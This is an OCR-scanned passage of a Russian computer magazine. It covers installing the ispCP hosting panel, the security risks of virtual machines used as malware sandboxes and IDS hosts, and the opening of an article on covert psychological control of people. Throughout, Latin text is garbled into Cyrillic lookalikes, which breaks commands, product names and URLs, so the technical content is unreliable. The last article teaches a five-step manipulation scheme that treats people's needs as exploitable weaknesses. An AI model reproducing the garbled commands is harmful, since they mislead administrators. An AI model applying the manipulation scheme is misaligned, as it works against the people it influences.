$ зибо -з 

# сб /ѵаг/ѵллплг/ізрер/епдіпе/зекир 



Установку лучше производить начистую систему. Присутствие «лиш- 
них» сервисов (например, Зепбтаіі, Ехіт и т.д.) вызовет конфликт и 
приведет к остановке процесса. Устанавливаем пакеты для компиля- 
ции, МуЗС^Ь и задаем пароль администратора: 

$ зибо арк-дек іпзкаіі тузді-сііепк тузді-зегѵег Ьиііб- 
еззепкіаі 

$ туздіабтіп -и гоок раззтлгогб раззілгагб 



И — ставим: 

# регі ізрер-зекир 

Установочный скрипт начнет последовательно задавать вопросы (в 
квадратных скобках будут предлагаться значения по умолчанию) . 
Сначала создается аккаунт для Кр-пользователя. Нажимаем <Етег> ; 
пароль генерируется автоматически: 
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> ІП^О 

• ІзрСР 1 .0.0 РСббез 
проблем ставится на 
СепЮБ, РесІНаі, Ребога, 
ЭеЬіап, ІІЬипіи,51І5Е, 
орепБІІБЕ, Біаскѵѵаге, 
бепіоо, ЕгееВБЭ 

и ОрепВБЭ. 

• Используя хостинг- 
панель ІзрСР, можно 
управлять настрой- 
ками АрасИе2 с РНР5, 
ВІПСІ9, МуЗОЬ, Соигіег, 
Ргостаіі, РозЬіх, 
Розідгеу, РгоЕТРб, 
АѴѴБіаіз, іріаЫез, 5азІ, 
гкбипіеги некоторыми 
другими. 




> Ипкз 

Сайт проекта ізрСР 
находится по адресу 

ѵѵѵѵѵѵ.ізр-сопігоІ.пеЕ 




Ріеазе епСег ізрСР іСр ЗОЬ изег раззѵгогсі. [аиСо 
депегаСе] : 

ізрСР іСр ЗОЬ изег раззтлгогсі зеС Со: 
есСКС7 8аМ,іщо1І7 ( 

Теперь отвечаем на вопрос о названии учетной записи 
рЬрМуАсІтіп и пароле для нее. После чего указываем логин 
(по умолчанию абтіп), пароль и е-таіі администратора 
ізрСР, ІР-адрес второго ЭИЗ-сервера и активацию АѴѴЗіаіз. 
На этом установка закончена. Не забываем удалить вре- 
менные файлы! 

ВЕБ-ИНТЕРФЕЙС І5РСР 

Регистрируемся в системе, используя логин асітіп и па- 
роль, указанный при установке. По дефолту язык интер- 
фейса — английский. Для локализации переходим в 5етп§ 
-> Ітетайопаіігайоп и нажатием кнопки Вгоѵѵзе в поле 
Іпзіаіі пеѵѵ 1ап§иа§е указываем на файл гиззіап, находящий- 
ся в каталоге 1ап§иа§е-Ше установочного архива. Затем 
нажимаем кнопку Іпзіаіі. Новый язык появится в поле 
Іпзіаііесі Іап^иа^ез. Отмечаем его как Эеіаик и нажимаем 
кнопку Заѵе. При необходимости аналогичным образом 
устанавливаем другие языки; пользователи сами потом 
смогут выбрать предпочитаемый вариант. 

Интерфейс визуально разделен на три части. Вверху 
располагаются шесть кнопок для доступа к основным 
настройкам. Их назначение понятно из названий: 
«Общая информация», «Управление пользовате- 
лями», «Системные инструменты, «Статистика» и 
«Служба поддержки и Настройки». Выбор любого из 
них откроет специфические меню в левой колонке. 
Все настройки производятся в центре окна. 



Проект БТС 

Одной из наиболее функциональных хостинг-панелей можно назвать Эотаіп 
ТесЬпоІо^іе Сотгоі (ЭТС) . Поддерживает: Віпй 8/9 (или совместимый), МуЗС^Ь, 
АрасЬе 1/2, РНР 4/5, Отаіі, РозШх, Соигіег, Сугиз, Эоѵесоі:, РгоРТРб, Риге-Йрсі, 
ИСРТР, ѴѴеЬаІігег, Аѵѵзіаі:, Атаѵіз, Сіатаѵ, ЗратАззаззіп, гипервизор Хеп и некото- 
рые другие. Список официально поддерживаемых систем, приведенный на сайте, 
небольшой: ЕгееВЗЭ, КеДНаЦ ЭеЪіап, СеШоо и Мае ОЗ X. Есть сведения о работе в 
ИеіВЗЭ. ЭТС присутствует в репозитариях некоторых других дистрибутивов. На- 
пример, есть в Шиши (однако не самая последняя версия, поэтому подключают 
альтернативный де биановский репозитарий «беЪ Йр://кр.§р1Ьозі:.сот/сіеЬіап/ 
зіаЫе таіп») . Хотя это упрощает установку в Шэипш, работать ЭТС в отдельных 
конфигурациях отказывается (причем, по разным причинам) . Приходится 
тратить время на поиск и устранение проблемы. В остальном, это очень удобное 
решение, также поддерживающее несколько типов учетных записей. Интерфейс 
локализован. Домашняя страница проекта — ѵ\длдл^.ур1Ьозі:.сот/зо1Гѵ\Ааге-(іі:с.]И:т1 . 



После установки перейди в меню «Общая информация» 
«Статус сервера» и убедись, что все сервисы запущены и 
работают нормально. Также стоит удостовериться, что 
они настроены на автозапуск. Проще всего перезагрузить 
сервер и вернуться в это окно посмотреть статистику. Если 
работает, значит, можно не беспокоиться (иначе — правим 
стартовые скрипты) . Перейдя в подпункт «Лог админа», 
можно просмотреть все события, связанные с работой 
ізрСР (регистрация, создание пользователей, ошибки 
входа и т.д.) . Изменить порт любого сервиса на нестандарт- 
ный можно в «Настройки» «Порты сервера». А информа- 
ция о параметрах системы, меню для обновления ізрСР и 
мускула находятся в меню «Системные инструменты». 

Если ошибиться при вводе пароля, в первый раз будет введе- 
на задержка в 15 секунд, затем — в 30, а после третьей неудач- 
ной попытки ІР блокируется на полчаса. Это поведение также 
можно изменить в меню «Настройки». В подпункте «Общие 
настройки» в поле «Раззжжі зепіп^з» выставляется мини- 
мальная длина пароля и (де) активируется режим строгого 
пароля. Режимы блокировки входа при неудачных попытках 
выставляются в поле «Определение атаки-перебора». 

Кроме стандартных возможностей, заложенных в интер- 
фейсе, в пункте «Персональное меню» можно создать свою 
кнопку, назначив ей определенное действие и уровень, на 
котором она будет доступна (администратор, реселлер или 
пользователь) . 

По умолчанию всем пользователям будет доступен только 
один ІР-адрес и домен, указываемый при установке. Если 
сервер имеет несколько сетевых интерфейсов или обслу- 
живает несколько доменов, информация о них указывается 
в разделе «Управление ІР-адресами», а при создании новой 
учетной записи реселлера или пользователя отмечаются 
доступные ему домены. Если трафик не безлимитный, 
стоит зайти в раздел «Настройка трафика сервера» и уста- 
новить предупреждения и лимиты. В общем, управление 
сервером в ізрСР довольно простое, — все работает после 
установки в режиме по умолчанию. В конфигурационные 



Проект Зузіет 
Сопигоі Рапеі 
(5у$СР) 

Это одно из самых популярных решений, которое 
используется многими хостерами. Начало разработок 
датировано ноябрем 2003 года — первый релиз под 
лицензией СИП СРЬ был представлен общественности 
в июне 2004. Написан на РНР, для хранения информа- 
ции используется МуЗС^Ь. Как и прочие решения, умеет 
создавать зоны в ВШЭ, поддомены, учетные записи, 
управлять почтовыми адресами и пересылкой писем — 
и многое другое. Поддерживаются: ВШЭ или РоѵѵегЭИЗ, 
АрасЬе 1/2, РНР 4/5, РозШх, Соигіег, Эоѵесоі, РгоРТРб, 
Ригеітр, ѴѴеЬаІігег, аутентификация Сугиз-зазі. Опци- 
онально могут быть установлены: МаіШгор, СІашАѴ и 
Зратаззаззіп, РНРтуАбтіпи ЗдиіггеІМаіІ. Доступны 
три вида учетных записей: администраторы, реселлеры 
и пользователи. Интерфейс локализован. Установка 
последних версий очень проста. Домашняя страница 
проекта — ілплпѵ.зѵзср.огу . 
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файлы понадобится заглядывать лишь при необходимости 
тонкой настройки под экзотическую ситуацию. 

После установки в системе присутствует только одна учет- 
ная запись со статусом администратора. Добавить другие, 
можно перейдя в меню «Управление учетными записями». 
В ізрСР, в отличие от некоторых других решений, админис- 
тратор не может сам отдавать отдельным пользователям 
запрашиваемые ресурсы. Эта функция возложена на ресел- 
леров, роль которых могут играть менеджеры. Поэтому в 
этом меню администратор может создать других админис- 
траторов и реселлеров, а также переназначить реселлера 
или пользователя другому админу либо реселлеру. Здесь же 
можно просматривать список активных пользовательских 
сессий и при необходимости завершать их. В пункте «Поч- 
товая рассылка» можно набрать сообщение и отправить 
его выбранной группе пользователей. Эту возможность 
обычно используют для оповещения об акциях, новых 
тарифах и т.д. 

Интерфейс реселлера несколько отличается от админского. 
Тут уже появились меню «Управление хостинг планами» и 
«Управление заказами». В первом настраиваются шаблоны 
хостинга под разные условия (лимиты места на диске, 
трафика, поддоменов, почтовых ящиков, стоимость и т.д.) . 
Во втором устанавливаются шаблоны заказов хостинга и 
показываются новые заказы. Пользователи и псевдонимы 



Модуль 

Ѵігшаітіп 

Всем, кто пользуется ѴѴеЪтіп, можно предложить модуль 
Ѵігшаітіп Г шѵѵѵѵ.ѵѵеЬтіп.сот/іп(іех8.Ьі:т1) . который 
позволяет через единый интерфейс управлять мно- 
жеством виртуальных узлов АрасЬе, ВШЭ, баз МуЗС^Ь 
и почтовых ящиков Зепбтаіі или Розйгх. Для каждого 
виртуального сервера создается новый пользователь, 
который может в дальнейшем самостоятельно админис- 
трировать свой участок. Для настройки используются 
имеющиеся для этих серверов стандартные модули, куда 
добавляются новые возможности, поэтому Ѵігшаітіп 
будет работать в большинстве конфигураций. Существу- 
ют две версии: СРЬ и коммерческая Рго Гдлллдл^. ѵігшаітіп, 
сот) . В последней дополнительно доступны НТМЬ-ре- 
дактор, настройка антиспам и антивирусной проверки, 
поддержка реселлеров и некоторые другие возможности. 



доменов создаются в меню «Управление пользователями». 
При выборе пункта нас встречает пошаговый мастер, ко- 
торый поможет быстро настроить все параметры. При со- 
здании пользователя следует учитывать свои лимиты. Так, 
если лимит места на диске у реселлера 1 Гб, то при попытке 
дать пользователю больше места, получим ошибку. Также, 
как администратор, реселлер может рассылать сообщения, 
но только «своим» пользователям (сделать можно из меню 
почтовая рассылка) . 

Панель пользователя имеет все необходимое для управле- 
ния доступными ЗОЬ-базами, доменами и псевдонимами, 
почтовыми ящиками и учетными записями РТР. Доступен 
и веб-интерфейс, позволяющий работать с электронной 
почтой прямо из браузера. Встроенный пеі2Лр обеспечива- 
ет доступ к файлам на РТР через браузер. При необходимос- 
ти можно активировать защищенные зоны на веб-сервере 
или настроить СаШй-аП, то есть перехватывать всю почту, 
идущую в домен. По умолчанию ізрСР создает резервные 
копии ежедневно. Доступ для восстановления информации 
можно получить из меню «Веб-инструменты» -> «Ежеднев- 
ный бэкап». 

ЖИТЬ БУДЕТ ПРОЩЕ 

Установка и настройка ізрСР, как видишь, не сильно отли- 
чается от установки стандартной связки серверов. Но зато, 
если часто возникает необходимость в создании виртуаль- 
ных серверов и почтовых аккаунтов с установкой различ- 
ных ограничений и работой с ЭЫ5, — ізрСР и подобные 
решения на порядок упрощают жизнь администратору, ц-л 




> СІѴСІ 

На прилагаемом к 
журналу диске ты 
найдешь файл лока- 
лизации интерфейса 
ІБРСопіід 3. 




> ѵѵагпіпд 

Перед выбором хос- 
тинг-панели следует 
четко определиться 
стребованиями, 
в частности с серви- 
сами, которые нужно 
поддерживать. 
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Властелин 

виртуальных 

МАШИН 



ПРАКТИЧЕСКИЕ СОВЕТЫ ПО РАЗВЕРТЫВАНИЮ ВИРТУАЛЬНОЙ ИНФРАСТРУКТУРЫ 



Современные процессоры настолько мощны, что позволяют эмулировать 
самих себя практически без тормозов. В области системного администриро- 
вания это находит большое практическое применение. Но не все так просто, 
и прежде, чем возводить виртуальную систему, следует взвесить все аргу- 



менты за и против. 



ДВЕРИ В ВИРТУАЛЬНЫЙ МИР 

За последние годы на рынке появилось множество виртуальных машин 
— от узкоспециализированных (ВосЬз, еЕуе) до эмуляторов общего 
назначения (ѴМѵѵаге, ѴігШаІВох, (^ЕМИ, ХЕИ, Ѵігшаі РС) . Интерес к 
виртуализации растет, а сами эмуляторы по ходу дела осваивают новые 
профессии, становясь все более и более привлекательными игрушками 



в глазах системных администраторов. Именно «игрушками» — потому 
что к введению в промышленную эксплуатацию существующие эмуля- 
торы еще не готовы. Ущерб от их использования намного превышает 
стоимость живого железа, которое они призваны заменять (не говоря 
уже о том, что большинство эмуляторов распространяются на коммер- 
ческой основе или, попросту, стоят денег) . 
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Внешний вид эмулятора ѴігШаІВох 

Тем не менее, играться с виртуальными машинами можно и нужно! 
Есть все основания ожидать, что в ближайшие несколько лет разработ- 
чики вылижут баги и доведут эмуляторы до ума, а потому осваивать 
их надо прямо сейчас, чтобы потом не разворачивать виртуальную 
инфраструктуру впопыхах. 

Существует, по меньшей мере, три типа виртуальных машин (не считая 
гибридов) . К самым первым (и самым древним) относятся машины с 
полной эмуляцией. Классический пример — ВосЬз. Тормозит ужасно, 
зато позволяет эмулировать «чужеродные» архитектуры, например, 
х86 на Мотороллере или х86-64 на х86. Возвести многопроцессор- 
ную машину на однопроцессорной? Без проблем. Причем, основная 
операционная система надежно изолирована от гостевых виртуальных 
машин и причинить ей ущерб невероятно трудно. ВосЬз очень хорошо 
подходит для экспериментов с вирусами, червями и прочим зловред- 
ным ПО. Также его можно использовать для того, чтобы опробовать 
64-разрядные операционные системы, прежде чем решиться покупать 
х86-64 — но высокие накладные расходы на эмуляцию (даже с учетом 
оптимизации и кэширования инструкций) предъявляют жесткие 
требования к аппаратной оснастке базовой машины. И проблема здесь 
даже не в том, что ѴѴіпХР на Р-4 под «Борщем» стартует около суток. Она 
вообще не стартует! Поскольку куча операций отваливается по тайм- 
ауту, в частности, если процедура инициализации драйвера выполня- 
ется свыше 10 секунд, система автоматически выгружает драйвер со 
всеми вытекающими отсюда последствиями. 

Динамические виртуальные машины ((^ЕМИ, ѴМѵѵаге, ѴігШаІВох) 
эмулируют лишь привилегированные инструкции (равно, каки непри- 
вилегированные инструкции, имеющие доступ к системным данным) . 
За счет этого скорость эмуляции возрастает на несколько порядков, 
и на Р-Ш 733 уже можно комфортно работать в среде виртуального 
ѴѴіп2кЗ, а на Р-4 все просто летает. Расплатой за скорость становится 
принципиальная невозможность эмуляции «чужеродных» архитектур, 
плюс потенциальный риск атаки на основную операционную систему 
из гостевой. Теоретически, создать надежный динамический эмулятор 
вполне возможно, но практически. . . это же тысячи строк на Си/Си + + 
и мегабайты кода! К тому же, разработчики С^ЕМЕ! и ѴМѵѵаге даже не 
пытались защитить основную систему от атаки со стороны гостевых 
виртуальных машин, чем с успехом пользуются вирусы и черви. 
Аппаратная виртуализация (поддерживаемая последними моделя- 
ми процессоров Ішеі и АМЭ) устраняет ляпы в х86-архитектуре, где 
системные данные надежно защищены только от записи, но могут быть 
прочитаны с прикладного уровня легальными непривилегированными 
командами. Это вынуждает эмулятор просматривать блок кода перед его 
выполнением, на что расходуется время. В процессорах фирмы МоШгоІа 
таких дефектов нет, и потому динамическая эмуляция на нихработает 
намного быстрее (и без всякой новомодной аппаратной поддержки!) . 




ЗапускѴѴІп2к под виртуальной машиной ВосЬз в режиме полной эмуляции 

Но рынок захватила х86-архитектура, вытеснив МоФгоГу, и потому 
аппаратную виртуализацию встречают с очень большим энтузиазмом. 
Теоретически, скорость эмуляции должна вплотную приближаться к 
«живому» процессору, поскольку накладные расходы на виртуализа- 
цию близки к нулю. Однако, помимо процессора, виртуальная машина 
вынуждена эмулировать еще и оборудование. Без жестких дисков ведь не 
обойтись, а давать прямой доступ к физическим хардам — самоубийство. 
В этом причина того, что производительность виртуальных машин (даже 
с поддержкой аппаратной эмуляции) существенно отстает от живого 
железа, но все-таки обгоняет динамическую эмуляцию. 

Естественно, за повышение скорости приходится платить. Во-первых, 
необходимо приобрести процессор с поддержкой аппаратной виртуа- 
лизации (ладно, это не проблема, приобретем в ходе очередного пла- 
нового апгрейда) . Во-вторых (а вот это уже действительно серьезно), 

— процессоры содержат кучу дефектов, позволяющих воздействовать 
на основную операционную систему из гостевых виртуальных машин. 
Исправить ошибку в процессоре намного сложнее, чем в полностью 
программном эмуляторе! И что самое неприятное — спонтанные па- 
дения основной системы происходят даже без всякой атаки со стороны 
вредоносного кода! Словом, аппаратная виртуализация до сих пор 
остается плохо отлаженной игрушкой, не готовой к промышленному 
внедрению. Несмотря на это, Місгозоііуже включила эмулятор с поддер- 
жкой аппаратной виртуализации в состав ѴѴіп2к8, конкурирующий с 
бесплатным проектом ХЕИ. 

ВИРТУАЛЬНЫЕ СЕРВЕРА 

Как можно использовать виртуальную машину в корпоративной или 
офисной сети? Например, поднять виртуальный сервер. А что? Допус- 
тим, нам нужен публичный ѴѴЕВ и приватный 5(2Б. По соображениям 
безопасности, публичный сервер должен быть расположен в так назы- 
ваемой демилитаризованной (ЭМ2) зоне, а приватный — внутри 

локальной сети, обнесенной по периметру глубоким защитным рвом 
(брандмауэром) . Что требует двух машин. А как быть, если в наличии 
имеется только одна? 

Теоретически (подчеркиваю!), можно поднять ѴМѵѵаге или Ѵігшаі РС, 
разместив публичный ѴѴЕВ-сервер на виртуальной машине, а приват- 
ный 5 ОБ — на основной. И это как бы будет работать. «Как бы» — пото- 
му что для достижения приемлемого уровня производительности даже 
при поддержке аппаратной виртуализации нам понадобится довольно 
мощное железо, способное тянуть эмулятор с разумной скоростью. 
Значит, много сэкономить все равно не удастся, а если добавить к этой 
сумме издержки от неизбежных атак на виртуальную машину и сбои 
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> ІШо 

• Разработчики ОЕМІІ 
и ѴМѵѵагедаже не 
пытал исьзащитить ос- 
новную систему от атаки 
со стороны гостевых 
виртуальных машин, 
чем с успехом пользуют- 
ся вирусы и черви. 

• Процессоры со- 
держат кучу дефек- 
тов, позволяющих 
воздействовать на 
основную опера- 
ционную систему из 
гостевых виртуальных 
машин. 

• Подробнее о ОЕМІІ 
читай в этом же номе- 
ре, в статье «Вирту- 
альный полигон». 




самой виртуальной машины, в долгосрочной перспекти- 
ве мы имеем весьма внушительные убытки. Купить два 
отдельных физических сервера — дешевле, да и работать 
они будут намного стабильнее. А если денег на железо нет, 
то лучше отказаться от ЭМ2-зон, поселив публичные и при- 
ватные сервисы на одной машине и запретив приватным 
сервисам принимать трафик с внешних интерфейсов. А для 
надежности — еще и закрыть порты на брандмауэре. Как 
говорится, дешево и сердито, но это все-таки лучше, чем 
возня с виртуальными машинами. 



ЗАГОН ДЛЯ ВИРУСОВ 

Достаточно часто виртуальные машины используются для 
экспериментов с потенциально небезопасным програм- 
мным обеспечением, полученным из ненадежных источ- 
ников. Антивирусная проверка — не слишком-то хорошее 
средство для поиска неизвестных или модифицированных 
червей, вирусов и руткитов. Вредителям хорошо известно, 
как «ослепить» проактивные технологии и эвристические 
анализаторы. Утилиты, ориентированные на поиск рутки- 
тов, хорошо работают лишь в первые дни своего появле- 
ния, а затем хакеры находят обходной путь. 

Прямое сравнение дисковых образов палит все руткиты, 
червей и вирусы без исключения (конечно, при условии, 
что они вносят изменения в файловую систему, а не огра- 
ничиваются заражением одной лишь оперативной памяти, 
умирая при перезагрузке) . Алгоритм поиска заразы вы- 
глядит так: снимаем образ стерильной системы, сохраняя 



• Существующие виртуальные машины предназначены для запуска честных 
приложений и чисто конструктивно не приспособлены для изоляции зловредного 
программного обеспечения. А потому использовать их в роли «песочницы» (свое- 
образного загона для вирусов) категорически не рекомендуется, а если и исполь- 
зовать, то только с кучей предосторожностей, описанных в настоящей статье. 

• Даже самый крутой руткит не устоит против сравнения дисковых образов 
(за вычетом руткитов, обитающих исключительно в оперативной памяти и не 
вносящих в файловую систему никаких изменений) . Проблема в том, что руткиты 
уже научились детектировать популярные виртуальные машины, отказываясь от 
вторжения в их присутствии. А потому, чем меньше известна виртуальная маши- 
на, тем лучше для администратора и хуже для руткита. 



его в надежном месте, устанавливаем новое программное 
обеспечение, снимаем еще один образ. Монтируем оба 
образа на заведомо не зараженную систему и сравнива- 
ем их. Тривиальное пофайловое сравнение выявляет до 
90%малвари. Остальные 10% обнаруживает побайтовое 
сравнение, «вытягивающее» вирусы, прячущиеся в ОТР5- 
потоках или других местах (работая с диском на низком 
уровне, мы должны знать все базовые структуры файловой 
системы, подробно описанные в моей книге «Техника вос- 
становления данных», электронную копию которой можно 
бесплатно скачать здесь: пегиті. ог г и /гесоѵег-іиіі-гиз . гір) . 
Естественно, проводить подобные эксперименты лучше 
всего под эмулятором. Так намного проще оперировать 
образами виртуальных жестких дисков, да и выделять 
отдельную (физическую) машину не потребуется. Удобство, 
простота и экономия — налицо. Но простота хуже воровст- 
ва, и экономия на выделенной машине до добра не доводит. 
Если виртуальная машина соединена с основной системой 
виртуальной сетью, то черви могут атаковать базовую 
операционную систему, используя дыры в сетевых службах. 
Администратору следует либо своевременно устанавли- 
вать все заплатки, либо отключить вирусный загон от Сети 
вообще — не забывая про расшаренные ресурсы. Вирту- 
альная машина ѴМѵѵаге поддерживает их в обход ЕіЬетеі- 
адаптера. Шары продолжают работать даже после удаления 
виртуальной сетевой карты, и подвержены сразу двум типам 
атак — через дыры в сервисе «общих папок» и путем засылки 
червей, модифицирующих шаблон папки, автоматически 
«подхватываемый» Проводником. То же самое относится и ко 
всем остальным типам носителей. Это существенно затруд- 
няет обмен данными между виртуальной и основной маши- 
нами. Самое надежное — копировать данные через СЭ-КОМ 
(не обязательно физический — подойдет и виртуальный, 
просто берем любую программу для создания ізо-образов и 
монтируем ее на основную систему и на ѴМѵѵаге) . 

Важно: по умолчанию ѴМѵѵаге автоматически распознает 
все подключаемые ІІ5В-устройства и дает виртуальным 
машинам к ним полный доступ. Допустим, мы подклю- 
чаем ЕБА5Н, внешний жесткий диск с ІІ5В-интерфейсом 
или другой девайс подобного рода, на котором тут же 
поселяется вирус, вырвавшийся из застенков виртуаль- 
ной машины. Чтобы предотвратить вторжение, достаточ- 
но отключить ШВ-контроллер в свойствах виртуальной 
машины. 

Однако проблемы на этом не заканчиваются. Руткиты уже 
давно научились распознавать виртуальные машины, от- 
казываясь от заражения в их присутствии, что ломает весь 
концепт. Мы устанавливаем программное обеспечение с 
руткитом на виртуальную машину, сравниваем образы, 
ничего не находим и, довольные собой, запускаем руткита 
в основную систему. Выходит, гарантировано обнаружить 
современных руткитов при помощи виртуальных машин 
невозможно ! А если еще учесть большое количество дыр в 
эмуляторах, то руткит имеет все шансы заразить основную 
систему из гостевой машины. Выход? Либо использовать 
выделенную живую машину, либо надежную виртуаль- 
ную машину с полной эмуляцией (например, ВосЬз) . Это 
предотвратит вирусное вторжение, но, увы, не спасет от 
детекции виртуальной машины руткитом. ВосЬз содержит 
множество мелких дефектов эмуляции (ведет себя не как 
настоящий процессор), которые не препятствуют работе 
нормальных программ, но могут быть использованы для 
детекта эмулятора. К тому же, ЛЮБОЙ эмулятор несет на 
своем борту довольно специфический набор виртуального 
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железа, по которому его легко опознать. И хотя при наличии исходных 
текстов мы можем воспрепятствовать этому — купить живой компью- 
тер намного дешевле, чем корежить виртуальное железо. 

Резюмируя вышесказанное, делаем вывод: виртуальные машины — не 
слишком-то надежный загон для вирусов, хотя если не быть паранои- 
ком, то (с учетом низкого качества подавляющего большинства виру- 
сов и руткитов) лучше использовать виртуальную машину, чем всецело 
полагаться на антивирусы. 

ИНСТРУМЕНТ ВЫЯВЛЕНИЯ СЕТЕВЫХ АТАК 

Офисные сети обычно не испытывают необходимости в сенсорах и 
датчиках, детектирующих вторжение, а если и испытывают, то дело 
обычно ограничивается приобретением коммерческой Ш5/ІР5-сис- 
темы, встраиваемой в брандмауэр и спокойно работающей на шлюзе 
в интернете или на одном из узлов локальной сети. 

С ростом сети появляется желание установить специализированную 
систему обнаружения вторжений, например, 5поги (бесплатный) 
или АМР (коммерческий) . И разместить ее на выделенном узле, 
поскольку для установки того же АМР администратор должен предо- 
ставить его поставщикам удаленный зйеіі на свою машину. Причем, 
АМР будет не только автоматом скачивать свежие сигнатуры из Сети, 
но и отправлять весь подозрительный трафик для анализа на серверы 
компании Епбеаѵог, которая и является его разработчиком. 

Доверие — это прекрасно, но отдавать свой трафик в чужие руки. . . 
Нет, лучше разместить эту штуку на отдельном узле, отключенном 
от основной локальной сети, но запитанном от того же самого І5Р 
— то есть ловящего тех же вирусов и червей, что и основные узлы 
локальной сети. Можно ли использовать для этой цели виртуальную 
машину? Конечно! Главное, надежно изолировать ее от корпоратив- 
ной сети. 

Наибольшую проблему представляют виртуальные сетевые карты, 
через которые гостевая операционная система легко доберется до 
основной. Все виртуальные карты в обязательном порядке должны 
быть отключены! Но. . . если у нас нет сети, как же тогда общаться с 
внешним миром и ловить трафик? Вариантов много. Вот только один 
из них: АИЗЬ-модем с ИЗВ-интерфейсом, подключенный к вирту- 
альной машине с выдернутой сетевой картой и заблокированными 
шарами. 

Какую именно виртуальную машину следует использовать? ѴМѵѵаге 
очень известна и слишком дырява. ВосЬз невероятно медленно рабо- 
тает. Ѵігшаі РС — неплохой выбор, но учитывая большое количество 
дыр в процессорах, его использование крайне небезопасно. Реально 
остается только ѴігШаІВох, ХЕП или С^ЕМИ, хотя первый из них все 
еще достаточно сырой и до сих пор не отлаженный. 





ЕпбеаѵогАсііѵе Маіѵѵаге Ргоіесііоп (АМР) словила нового червя и отобрази- 
ла его структуру в наглядном удобочитаемом виде 



ЗЕРКАЛЬНЫЙ СЕРВЕР 

Вредоносная природа червей и вирусов вполне объяснима. Они как раз 
для этого и писались. Увы, честное программное обеспечение зачастую 
наносит намного больший урон. Взять хотя бы обновления безопаснос- 
ти или новые версии. Всем администраторам хорошо известно, что их 
установка порой приводит к трудноразрешимым конфликтам, потерям 
данных, а то и полному краху операционной системы! 

Аналогичным образом дела обстоят с кручением настроек, смысла ко- 
торых администратор до конца не понимает и действует методом тыка. 
Одно неверное движение руки — и система отказывается загружаться, 
а чтобы поднять ее, требуются знания и квалификация, вырабатывае- 
мые только в борьбе с вот такими взлетами и падениями. По книжкам 
всего не выучишь. . . И здесь виртуальные машины — незаменимы. 
Просто устанавливаем систему со всеми приложениями и сервисными 
службами на ѴМѵѵаге /Ѵігшаі РС/ѴігШаІВох/еШ, и все новые заплатки, 
обновления, настройки в первую очередь обкатываем на гостевой опе- 
рационной системе, наблюдая за ее реакцией. Если полет нормальный 
— переносим изменения на основную машину. Если же нет — сообра- 
жаем, что здесь не так, и где косяк. 

Виртуальные машины открывают практически неограниченные 
возможности для экспериментов. Главное — правильно ими восполь- 
зоваться, предусмотрев максимум возможных побочных эффектов и 
разработав план по их устранению, т 
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в СЛУХИ ДОЛОЙ! 

Каждый испытывает на себе влияние окружающих и пытается 
воздействовать на других. Это то, с чем сталкиваешься ежедневно. 
Разница лишь в том, являешься ты объектом скрытого управления или 
субъектом. А чаще всего — и тем и другим, одновременно. Получается, 
что скрытое управление — чуть ли не жизненно важный социальный 
навык. Многие (неосознанно для себя) пытаются влиять на преподава- 
телей ради положительной оценки или на друзей — с целью завоевать 



ихуважение. Это и есть навыки скрытого управления, и ты ими уже 
владеешь! В этой статье я лишь немного структурирую твои знания, 
и покажу общий механизм управления — с тем, чтобы им можно было 
пользоваться осознанно, а значит, более эффективно и успешно. 

Н ЭТАПЫ СКРЫТОГО УПРАВЛЕНИЯ 

Попытаемся разложить схему скрытого управления на этапы. Можно 
выделить пять основных пунктов: 
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^1 Скрытое управление — это вмешательство в психические структуры 



. Сбор информации об адресате. 

2. Обнаружение мишеней и приманок. 

3. Аттракция. 

4 . Понуждение адресата кдействию. 

5 . Выигрыш инициатора воздействия. 

Сбор информации — это поиск сведений об объекте, с помощью ко- 
торых можно обнаружить мишени и приманки воздействия. Мишень 

— те особенности личности (слабости, потребности, желания], на 
которые мы воздействуем с целью управления на объект. Приманка 

— сродни блесне при рыбной ловле, нечто, притягивающее внимание 
объекта. Аттракция — это привлечение и удержание внимания объек- 
та, умение расположить к себе. Если ты вспомнишь НЛП, то аттракция 
схожа с присоединением, подстройкой. Побуждение кдействию — это 
воздействие на сознание, подсознание и включение соответствую- 
щей деятельности объекта. С выигрышем, думаю, и так все понятно. 
Эти пять шагов описывают любую самую сложную схему скрытого 
воздействия. Нов большинстве случаев скрытое управление идет 

по более простому маршруту и включает в себя лишь некоторые из 
перечисленных этапов. 

Н КЛЮЧИ ОТ ЛЮДСКИХ ДУШ 

Известно ли тебе, что у человека есть ряд потребностей, удовлетворе- 
ние которых приносит положительные эмоции и радость? Именно они 
используются для управления людьми. Существует всего пять групп 
базовых потребностей: 

1. Физиологические потребности (вода, еда, жилье, секс и т.д.]. 

2. Потребность в безопасности (в том числе, уверенность в своем 
будущем]. 

3. Потребность принадлежать какой-либо общности (семье, группе 
единомышленников, партии и пр.]. 

4 . Потребность в признании, уважении. 

5 . Потребность в самореализации. 

С точки зрения скрытого управления, наши потребности — это слабо- 
сти (а-ля ошибки в программном обеспечении, способные привести 
к несанкционированному доступу]. К ним можно подобрать ключ. На- 
пример, при продаже автомобиля, чтобы заинтересовать покупателя 
и спровоцировать его на покупку, достаточно понимать, какую именно 
потребностьтот испытывает. Если это пунктдва (в нашей классифи- 
кации], то предложение автомобиля с большим количеством подушек 
безопасности и рассказ об опциях автомобиля, так или иначе связан- 
ных именно с безопасностью, наверняка, заинтересуют покупателя. 

В то время как рассказ о престижности автомобиля не будет иметь 
успеха и, скорее всего, человек уйдет, такничегоне купив. 

Вот еще пример скрытого управления: молодой сисадмин работает 
в команде проекта, но особого желания работать сверхурочно (как и 



вся команда] не испытывает. Менеджер проекта, зная, что админис- 
тратор испытывает потребность в уважении, говорит ему: «Ты очень 
перспективный, сильный специалист, не знаю, чтобы мы бы без тебя 
делали...». После чего парень начинает работать с удвоенной силой. 
Удовлетворяя потребность системного администратора в призна- 
нии, менеджер скрыто управляет им. Человеческие слабости служат 
хорошим полигоном для скрытого управления. Яркий тому пример 

— любовь к халяве. Достаточно в ссылке на веб-странице написать 
«халява» и редко, кто пройдет мимо. Это тоже скрытое управление: 
заставить пользователей пойти по ссылке, основываясь на ихтяге ко 
всему бесплатному. 

СФОРМИРУЕМ МИШЕНИ 

Существуютуниверсальные побудители-мишени, такие какчувство 
достоинства, стремление куспеху, стремление к материальной выго- 
де, получение удовольствия или комфорта, желание быть здоровым, 
иметь благополучную личную жизнь и т.д. Однако, чем малочисленнее 
группа, на которую ты хочешь оказать воздействие, тем точнее дол- 
жен быть вы бор мишеней. Давай на примерах посмотрим, что значит 
создать мишень. 

Наверняка тебе известна поговорка «запретный плод сладок». Мани- 
пулятор может возбудить желание объекта к чему-то запретному, 

— мишенью при этом будет стремление объекта к преодолению каких- 
либо запретов. Жертва выберет то, что является запретным, с полной 
иллюзией, что она сама делает выбор. 

